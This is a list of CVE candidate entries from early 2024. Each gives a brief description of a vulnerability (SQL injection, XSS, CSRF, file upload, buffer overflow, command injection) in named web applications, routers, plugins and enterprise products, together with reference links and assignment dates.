CVE 2024 2269 Candidate A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256039. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256039 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256039 | MISC:VDB-256039 | keerti1924 Online-Book-Store-Website search.php sql injection | URL:https://vuldb.com/?id.256039 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/SQL%20Injection%20Search/SQL%20Injection%20in%20search.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/SQL%20Injection%20Search/SQL%20Injection%20in%20search.php%20.md Assigned (20240307)
CVE 2024 22682 Candidate DuckDB <=0.9.2 and DuckDB extension-template <=0.9.2 are vulnerable to malicious extension injection via the custom extension feature. MISC:https://github.com/Tu0Laj1/database_test Assigned (20240111)
CVE 2024 2268 Candidate A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been classified as critical. Affected is an unknown function of the file /product_update.php?update=1. The manipulation of the argument update_image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256038 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256038 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256038 | MISC:VDB-256038 | keerti1924 Online-Book-Store-Website unrestricted upload | URL:https://vuldb.com/?id.256038 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/File%20Upload/Arbitrary%20FIle%20Upload%20in%20product_update.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/File%20Upload/Arbitrary%20FIle%20Upload%20in%20product_update.php%20.md Assigned (20240307)
CVE 2024 2267 Candidate A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0 and classified as problematic. This issue affects some unknown processing of the file /shop.php. The manipulation of the argument product_price leads to business logic errors. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256037 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256037 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256037 | MISC:VDB-256037 | keerti1924 Online-Book-Store-Website shop.php logic error | URL:https://vuldb.com/?id.256037 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Business%20Logic/Business%20Logic%20shop.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Business%20Logic/Business%20Logic%20shop.php%20.md Assigned (20240307)
CVE 2024 22667 Candidate Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions. CONFIRM:https://security.netapp.com/advisory/ntap-20240223-0008/ | FEDORA:FEDORA-2024-12513b5cee | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UI44Y4LJLG34D4HNB6NTPLUPZREHAEL7/ | FEDORA:FEDORA-2024-1c85d5b179 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIQLVUSYHDN3644K6EFDI7PRZOTIKXM3/ | MISC:https://gist.githubusercontent.com/henices/2467e7f22dcc2aa97a2453e197b55a0c/raw/7b54bccc9a129c604fb139266f4497ab7aaa94c7/gistfile1.txt | MISC:https://github.com/vim/vim/commit/b39b240c386a5a29241415541f1c99e2e6b8ce47 Assigned (20240111)
CVE 2024 22663 Candidate TOTOLINK_A3700R_V9.1.2u.6165_20211012has a command Injection vulnerability via setOpModeCfg MISC:https://github.com/Covteam/iot_vuln/tree/main/setOpModeCfg2 Assigned (20240111)
CVE 2024 22662 Candidate TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules MISC:https://github.com/Covteam/iot_vuln/tree/main/setParentalRules Assigned (20240111)
CVE 2024 22660 Candidate TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg MISC:https://github.com/Covteam/iot_vuln/tree/main/setLanguageCfg Assigned (20240111)
CVE 2024 2266 Candidate A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. This vulnerability affects unknown code of the file /login.php of the component Login Page. The manipulation of the argument emailcookie/passwordcookie leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256036. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256036 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256036 | MISC:VDB-256036 | keerti1924 Secret-Coder-PHP-Project Login Page login.php cross site scripting | URL:https://vuldb.com/?id.256036 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20XSS%5D%20on%20login.php%20via%20arbitrary%20cookies.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20XSS%5D%20on%20login.php%20via%20arbitrary%20cookies.md Assigned (20240307)
CVE 2024 22651 Candidate There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04. MISC:https://github.com/goldds96/Report/blob/main/DLink/DIR-815/CI.md Assigned (20240111)
CVE 2024 2265 Candidate A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. This affects an unknown part of the file login.sql. The manipulation leads to inclusion of sensitive information in source code. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256035. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256035 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256035 | MISC:VDB-256035 | keerti1924 PHP-MYSQL-User-Login-System login.sql inclusion of sensitive information in source code | URL:https://vuldb.com/?id.256035 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20publicly%20exposed%20password%20hashes.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20publicly%20exposed%20password%20hashes.md Assigned (20240307)
CVE 2024 22648 Candidate A Blind SSRF vulnerability exists in the "Crawl Meta Data" functionality of SEO Panel version 4.10.0. This makes it possible for remote attackers to scan ports in the local environment. MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22648 Assigned (20240111)
CVE 2024 22647 Candidate An user enumeration vulnerability was found in SEO Panel 4.10.0. This issue occurs during user authentication, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames. MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22647 Assigned (20240111)
CVE 2024 22646 Candidate An email address enumeration vulnerability exists in the password reset function of SEO Panel version 4.10.0. This allows an attacker to guess which emails exist on the system. MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22646 Assigned (20240111)
CVE 2024 22643 Candidate A Cross-Site Request Forgery (CSRF) vulnerability in SEO Panel version 4.10.0 allows remote attackers to perform unauthorized user password resets. MISC:https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22643 Assigned (20240111)
CVE 2024 2264 Candidate A vulnerability, which was classified as critical, has been found in keerti1924 PHP-MYSQL-User-Login-System 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256034 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256034 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256034 | MISC:VDB-256034 | keerti1924 PHP-MYSQL-User-Login-System login.php sql injection | URL:https://vuldb.com/?id.256034 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20PHP-MYSQL-User-Login-System/SQLI%20Auth.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20PHP-MYSQL-User-Login-System/SQLI%20Auth.md Assigned (20240307)
CVE 2024 22639 Candidate iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface. MISC:https://packetstormsecurity.com/files/176411/iGalerie-3.0.22-Cross-Site-Scripting.html Assigned (20240111)
CVE 2024 22638 Candidate liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulenrabiity via the component /livesite/edit_designer_region.php. MISC:https://packetstormsecurity.com/files/176420/liveSite-2019.1-Remote-Code-Execution.html Assigned (20240111)
CVE 2024 22637 Candidate Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2. MISC:https://packetstormsecurity.com/files/176403/Form-Tools-3.1.1-Cross-Site-Scripting.html Assigned (20240111)
CVE 2024 22636 Candidate PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field. MISC:https://github.com/capture0x/PluXml-RCE/blob/main/PluXml.txt Assigned (20240111)
CVE 2024 22635 Candidate WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php. MISC:https://packetstormsecurity.com/files/176365/WebCalendar-1.3.0-Cross-Site-Scripting.html Assigned (20240111)
CVE 2024 22628 Candidate Budget and Expense Tracker System v1.0 is vulnerable to SQL Injection via /expense_budget/admin/?page=reports/budget&date_start=2023-12-28&date_end= MISC:https://github.com/GaoZzr/CVE_report/blob/main/budget-and-expense-tracker-system/SQLi-1.md Assigned (20240111)
CVE 2024 22627 Candidate Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_distributor.php?id=. MISC:https://github.com/GaoZzr/CVE_report/blob/main/Supply_Management_System/SQLi-3.md Assigned (20240111)
CVE 2024 22626 Candidate Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_retailer.php?id=. MISC:https://github.com/GaoZzr/CVE_report/blob/main/Supply_Management_System/SQLi-2.md Assigned (20240111)
CVE 2024 22625 Candidate Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_category.php?id=. MISC:https://github.com/GaoZzr/CVE_report/blob/main/Supply_Management_System/SQLi-1.md Assigned (20240111)
CVE 2024 22603 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/links/add_link MISC:https://github.com/ljw11e/cms/blob/main/4.md Assigned (20240111)
CVE 2024 22601 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/scorerule_save MISC:https://github.com/ljw11e/cms/blob/main/5.md Assigned (20240111)
CVE 2024 22593 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/add_group_save MISC:https://github.com/ysuzhangbin/cms2/blob/main/3.md Assigned (20240111)
CVE 2024 22592 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_update MISC:https://github.com/ysuzhangbin/cms2/blob/main/2.md Assigned (20240111)
CVE 2024 22591 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_save. MISC:https://github.com/ysuzhangbin/cms2/blob/main/1.md Assigned (20240111)
CVE 2024 22570 Candidate A stored cross-site scripting (XSS) vulnerability in /install.php?m=install&c=index&a=step3 of GreenCMS v2.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. MISC:https://github.com/Num-Nine/CVE/issues/11 Assigned (20240111)
CVE 2024 22569 Candidate Stored Cross-Site Scripting (XSS) vulnerability in POSCMS v4.6.2, allows attackers to execute arbitrary code via a crafted payload to /index.php?c=install&m=index&step=2&is_install_db=0. MISC:https://github.com/Num-Nine/CVE/issues/12 Assigned (20240111)
CVE 2024 22568 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/del. MISC:https://github.com/kayo-zjq/myc/blob/main/1.md Assigned (20240111)
CVE 2024 22567 Candidate File Upload vulnerability in MCMS 5.3.5 allows attackers to upload arbitrary files via crafted POST request to /ms/file/upload.do. MISC:https://github.com/h3ak/MCMS-CVE-Request/ Assigned (20240111)
CVE 2024 22563 Candidate openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c. MISC:https://github.com/openvswitch/ovs-issues/issues/315 Assigned (20240111)
CVE 2024 22562 Candidate swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c. MISC:https://github.com/matthiaskramm/swftools/issues/210 Assigned (20240111)
CVE 2024 2256 Candidate The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes such as bw_contact_button and bw_button shortcodes in all versions up to, and including, 4.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail= | MISC:https://www.oik-plugins.com/shortcode_example/bw_contact_button-security-fix/ | URL:https://www.oik-plugins.com/shortcode_example/bw_contact_button-security-fix/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve Assigned (20240307)
CVE 2024 22559 Candidate LightCMS v2.0 is vulnerable to Cross Site Scripting (XSS) in the Content Management - Articles field. MISC:https://github.com/eddy8/LightCMS/issues/34 Assigned (20240111)
CVE 2024 22551 Candidate WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search. MISC:https://packetstormsecurity.com/files/176314/WhatACart-2.0.7-Cross-Site-Scripting.html Assigned (20240111)
CVE 2024 22550 Candidate An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file. MISC:https://packetstormsecurity.com/files/176312/ShopSite-14.0-Cross-Site-Scripting.html Assigned (20240111)
CVE 2024 2255 Candidate The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.5.2 due to insufficient input sanitization and output escaping on user supplied attributes such as listStyle. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/essential-blocks/tags/4.5.2/blocks/TableOfContents.php#L120 | URL:https://plugins.trac.wordpress.org/browser/essential-blocks/tags/4.5.2/blocks/TableOfContents.php#L120 | MISC:https://plugins.trac.wordpress.org/changeset/3053199/essential-blocks/trunk/blocks/TableOfContents.php | URL:https://plugins.trac.wordpress.org/changeset/3053199/essential-blocks/trunk/blocks/TableOfContents.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve Assigned (20240307)
CVE 2024 22549 Candidate FlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the email settings of the website settings section. MISC:https://github.com/cccbbbttt/cms/blob/main/1.md Assigned (20240111)
CVE 2024 22548 Candidate FlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the system website settings website name section. MISC:https://github.com/5List/cms/blob/main/1.md Assigned (20240111)
CVE 2024 22547 Candidate WayOS IBR-7150 <17.06.23 is vulnerable to Cross Site Scripting (XSS). MISC:https://github.com/WarmBrew/web_vul/blob/main/wayos/wayos.md Assigned (20240111)
CVE 2024 22545 Candidate An issue was discovered in TRENDnet TEW-824DRU version 1.04b01, allows unauthenticated attackers to execute arbitrary code via the system.ntp.server parameter in the sub_420AE0() function. The attack can be launched remotely. MISC:https://warp-desk-89d.notion.site/TEW-824DRU-e7228d462ce24fa1a9fecb0bee57caad Assigned (20240111)
CVE 2024 22544 Candidate An issue was discovered in Linksys Router E1700 version 1.0.04 (build 3), allows authenticated attackers to execute arbitrary code via the setDateTime function. MISC:https://mat4mee.notion.site/Remote-Code-Execution-RCE-on-the-Linksys-Router-E1700-765c9bbf6a7f4171b670bc778bf9b005 Assigned (20240111)
CVE 2024 22543 Candidate An issue was discovered in Linksys Router E1700 1.0.04 (build 3), allows authenticated attackers to escalate privileges via a crafted GET request to the /goform/* URI or via the ExportSettings function. MISC:https://mat4mee.notion.site/Leaked-SessionID-can-lead-to-authentication-bypass-on-the-Linksys-Router-E1700-f56f9c4b15e7443fa237bd1b101a18d2 Assigned (20240111)
CVE 2024 22533 Candidate Before Beetl v3.15.12, the rendering template has a server-side template injection (SSTI) vulnerability. When the incoming template is controllable, it will be filtered by the DefaultNativeSecurityManager blacklist. Because blacklist filtering is not strict, the blacklist can be bypassed, leading to arbitrary code execution. MISC:https://gitee.com/xiandafu/beetl/issues/I8RU01 Assigned (20240111)
CVE 2024 22532 Candidate Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file. MISC:https://github.com/pwndorei/CVE-2024-22532 Assigned (20240111)
CVE 2024 22529 Candidate TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa. MISC:https://github.com/unpWn4bL3/iot-security/blob/main/29.md Assigned (20240111)
CVE 2024 22523 Candidate Directory Traversal vulnerability in Qiyu iFair version 23.8_ad0 and before, allows remote attackers to obtain sensitive information via uploadimage component. MISC:https://www.yuque.com/for82/vdzwqe/sc8ictw8poo8v5gl Assigned (20240111)
CVE 2024 22520 Candidate An issue discovered in Dronetag Drone Scanner 1.5.2 allows attackers to impersonate other drones via transmission of crafted data packets. MISC:https://github.com/Drone-Lab/Dronetag-vulnerability Assigned (20240111)
CVE 2024 2252 Candidate The Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.1.5 due to insufficient input sanitization and output escaping on user supplied attributes such as URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/droit-elementor-addons/ | URL:https://wordpress.org/plugins/droit-elementor-addons/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve Assigned (20240307)
CVE 2024 22519 Candidate An issue discovered in OpenDroneID OSM 3.5.1 allows attackers to impersonate other drones via transmission of crafted data packets. MISC:https://github.com/Drone-Lab/opendroneid-vulnerability Assigned (20240111)
CVE 2024 22515 Candidate Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component. MISC:https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability Assigned (20240111)
CVE 2024 22514 Candidate An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file. MISC:https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution Assigned (20240111)
CVE 2024 22513 Candidate djangorestframework-simplejwt version 5.3.1 and before is vulnerable to information disclosure. A user can access web application resources even after their account has been disabled due to missing user validation checks via the for_user method. MISC:https://github.com/dmdhrumilmistry/CVEs/tree/main/CVE-2024-22513 Assigned (20240111)
CVE 2024 22497 Candidate Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL. MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20admin-login-password)%20.md Assigned (20240111)
CVE 2024 22496 Candidate Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter. MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20admin-login-username)%20.md Assigned (20240111)
CVE 2024 22494 Candidate A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save mobile parameter, which allows remote attackers to inject arbitrary web script or HTML. MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20moblie%20para)A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20Jfinalcms%20moblie%20para.md Assigned (20240111)
CVE 2024 22493 Candidate A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML. MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20content%20para)A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20Jfinalcms%20content%20para.md Assigned (20240111)
CVE 2024 22492 Candidate A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML. MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20contact%20para)A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20Jfinalcms%20contact%20para.md Assigned (20240111)
CVE 2024 22491 Candidate A Stored Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the post/save content parameter. MISC:https://github.com/cui2shark/security/blob/main/A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20beetl-bbs%20post%20save.md Assigned (20240111)
CVE 2024 22490 Candidate Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter. MISC:https://github.com/cui2shark/security/blob/main/beetl-bbs%20-%20A%20reflected%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20the%20search%20box.md Assigned (20240111)
CVE 2024 2249 Candidate The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input sanitization and output escaping the user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3050316/lastudio-element-kit/trunk/includes/extensions/elementor/wrapper-link.php | URL:https://plugins.trac.wordpress.org/changeset/3050316/lastudio-element-kit/trunk/includes/extensions/elementor/wrapper-link.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve Assigned (20240307)
CVE 2024 22475 Candidate Cross-site request forgery vulnerability in multiple printers and scanners which implement Web Based Management provided by BROTHER INDUSTRIES, LTD. allows a remote unauthenticated attacker to perform unintended operations on the affected product. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. MISC:https://jvn.jp/en/jp/JVN82749078/ | URL:https://jvn.jp/en/jp/JVN82749078/ | MISC:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000 | URL:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000 | MISC:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000 | URL:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000 | MISC:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html | URL:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html | MISC:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002 | URL:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002 | MISC:https://www.toshibatec.com/information/20240306_01.html | URL:https://www.toshibatec.com/information/20240306_01.html Assigned (20240209)
CVE 2024 22473 Candidate TRNG is used before initialization by ECDSA signing driver when exiting EM2/EM3 on Virtual Secure Vault (VSE) devices. This defect may allow Signature Spoofing by Key Recreation.This issue affects Gecko SDK through v4.4.0. MISC:https://community.silabs.com/068Vm000001FrjT | URL:https://community.silabs.com/068Vm000001FrjT Assigned (20240110)
CVE 2024 2247 Candidate JFrog Artifactory versions below 7.77.7, 7.82.1, are vulnerable to DOM-based cross-site scripting due to improper handling of the import override mechanism. MISC:https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories | URL:https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories Assigned (20240307)
CVE 2024 22464 Candidate Dell EMC AppSync, versions from 4.2.0.0 to 4.6.0.0 including all Service Pack releases, contain an exposure of sensitive information vulnerability in AppSync server logs. A high privileged remote attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable system with privileges of the compromised account. MISC:https://www.dell.com/support/kbdoc/en-us/000221932/dsa-2024-072-security-update-for-dell-emc-appsync-for-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000221932/dsa-2024-072-security-update-for-dell-emc-appsync-for-vulnerabilities Assigned (20240110)
CVE 2024 22463 Candidate Dell PowerScale OneFS 8.2.x through 9.6.0.x contains a use of a broken or risky cryptographic algorithm vulnerability. A remote unprivileged attacker could potentially exploit this vulnerability, leading to compromise of confidentiality and integrity of sensitive information MISC:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities Assigned (20240110)
CVE 2024 22459 Candidate Dell ECS, versions 3.6 through 3.6.2.5, and 3.7 through 3.7.0.6, and 3.8 through 3.8.0.4 versions, contain an improper access control vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to unauthorized access to all buckets and their data within a namespace MISC:https://www.dell.com/support/kbdoc/en-us/000222470/dsa-2024-078-security-update-for-dell-ecs-access-control-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222470/dsa-2024-078-security-update-for-dell-ecs-access-control-vulnerability Assigned (20240110)
CVE 2024 22458 Candidate Dell Secure Connect Gateway, 5.18, contains an Inadequate Encryption Strength Vulnerability. An unauthenticated network attacker could potentially exploit this vulnerability, allowing an attacker to recover plaintext from a block of ciphertext. MISC:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities Assigned (20240110)
CVE 2024 22457 Candidate Dell Secure Connect Gateway 5.20 contains an improper authentication vulnerability during the SRS to SCG update path. A remote low privileged attacker could potentially exploit this vulnerability, leading to impersonation of the server through presenting a fake self-signed certificate and communicating with the remote server. MISC:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities Assigned (20240110)
CVE 2024 22455 Candidate Dell E-Lab Navigator, [3.1.9, 3.2.0], contains an Insecure Direct Object Reference Vulnerability in Feedback submission. An attacker could potentially exploit this vulnerability, to manipulate the email's appearance, potentially deceiving recipients and causing reputational and security risks. MISC:https://www.dell.com/support/kbdoc/en-us/000222015/dsa-2024-073-security-update-for-mobility-e-lab-navigator-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222015/dsa-2024-073-security-update-for-mobility-e-lab-navigator-vulnerabilities Assigned (20240110)
CVE 2024 22454 Candidate Dell PowerProtect Data Manager, version 19.15 and prior versions, contain a weak password recovery mechanism for forgotten passwords. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to unauthorized access to the application with privileges of the compromised account. The attacker could retrieve the reset password token without authorization and then perform the password change MISC:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities Assigned (20240110)
